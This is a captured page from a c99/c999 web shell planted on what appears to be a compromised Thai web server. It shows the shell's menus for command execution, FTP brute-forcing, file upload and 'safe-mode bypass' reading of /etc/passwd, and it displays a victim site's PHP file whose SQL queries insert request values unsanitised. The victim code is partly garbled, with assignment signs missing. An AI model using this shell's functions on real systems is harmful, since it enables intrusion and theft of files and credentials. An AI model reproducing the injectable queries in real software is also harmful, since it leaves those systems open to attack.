!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/develop_person_depart/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     EditTrainingByYear.php (4.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

include("../include/FunctionDB.php");
include(
"admin_menu.php");
include(
"../include/Function.php");
ConnectDB();
$sql "SELECT * FROM personal_tb WHERE Teacher_code='$Teacher_code'";
$res mysql_query($sql);
$rs mysql_fetch_array($res);
$strSQL "SELECT * FROM training_tb GROUP By Year_std";
$result mysql_query($strSQL); 
$num mysql_num_rows($result );
?> 

<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">

<style type="text/css">
<!--
.style12 {
    font-size: 16px;
    font-weight: bold;
}
.style13 {color: #FF0000}
-->
</style>
<table width="791" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td ><br> <fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Menu_Develop.php">หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="PersonDevList.php?Teacher_code=<? echo $rs[Teacher_code];?>">ข้อมูลการพัฒนาบุคลากร</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"></font><font size="2"><span class="style13">แก้ไขข้อมูลการพัฒนาบุคลากรรายปีงบประมาณ</span></font></legend>
            <label>
  <form id="form1" name="form1" method="post" action="">
    <table width="60%" border="0" align="center" cellpadding="0" cellspacing="1" style="background-color:#eeeeee; border:1px solid gray"size="12">
      
      <tr bgcolor="#CCCCCC">
        <td width="8%" height="25" bgcolor="#D2F49F" style="border:1px solid gray"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">No.</font></strong></div></td>
        <td width="24%" bgcolor="#D2F49F" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">ปีงบประมาณ</font></strong></div></td>
        <td width="68%" bgcolor="#D2F49F" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">จำนวนรายการทั้งหมด 
          / ปี</font></strong></div></td>
      </tr>
      <?php
$i 
1;
 while(
$row mysql_fetch_array($result))
 {

     if(
$count==0)
     {
?>
      <tr >
        <td align="center" bgcolor="#F7F7F7" ><strong><font color="#996600" size="2" face="Tahoma">
          <?=$i?>
        </font></strong></td>
        <td align="center" bgcolor="#F7F7F7" ><div align="center"><strong><font color="#996600" size="2" face="Tahoma"> <a href="EditTrainingList.php?Year_std=<?=$row["Year_std"]?>" title="Click to see Detail" class="d"> <? echo $row["Year_std"]?> </a> </font></strong></div></td>
        <td align="center" bgcolor="#F7F7F7" ><strong><font color="#996600" size="2" face="Tahoma">
          <?php
    $Year_std 
$row[Year_std];
    
$sql1 "Select * From training_tb Where Year_std='$Year_std'";
    
$result1 mysql_query($sql1);
    
$countnum mysql_num_rows($result1);
     echo 
$countnum;
    
    
?>
        </font></strong></td>
      </tr>
      <?
    $count
=1;
     }
else
{
?>
      <tr>
        <td align="center" bordercolor="#999966" bgcolor="#FFFFFF" ><strong><font color="#996600" size="2" face="Tahoma">
          <?=$i?>
        </font></strong></td>
        <td height="18" align="center" bgcolor="#FFFFFF" ><div align="center"><strong><font color="#996600" size="2" face="Tahoma"> <a href="EditTrainingList.php?Year_std=<?=$row["Year_std"]?>" title="Click to see Detail" class="d"> <? echo $row["Year_std"]?> </a> </font></strong></div></td>
        <td align="center" bgcolor="#FFFFFF" ><strong><font color="#996600" size="2" face="Tahoma">
          <?php
    $Year_std 
$row[Year_std];
    
$sql1 "Select * From training_tb Where Year_std='$Year_std'";
    
$result1 mysql_query($sql1);
    
$countnum mysql_num_rows($result1);
     echo 
$countnum;
    
?>
        </font></strong></td>
      </tr>
      <?
$count
=0;
}
$i++;
 }    

?>
      <tr>
        <td height="25" colspan="3" align="center" bgcolor="#D2F49F"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">ทั้งหมด</font><font color="#993333" size="2" face="Tahoma"> <? echo $num ?></font><font color="#000000" size="2" face="Tahoma"> ปี</font></strong></div></td>
      </tr>
    </table>
    <table width="32%" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td><div align="center"><font face="Tahoma"><a href="../graph/report.php?c1=<? echo $countnum;?>&amp;c2=<? echo $countnum;?>" class="d style12">แสดงกราฟ</a></font></div></td>
      </tr>
    </table>
    </form>
            </fieldset>
        <br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br>
      </font></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0068 ]--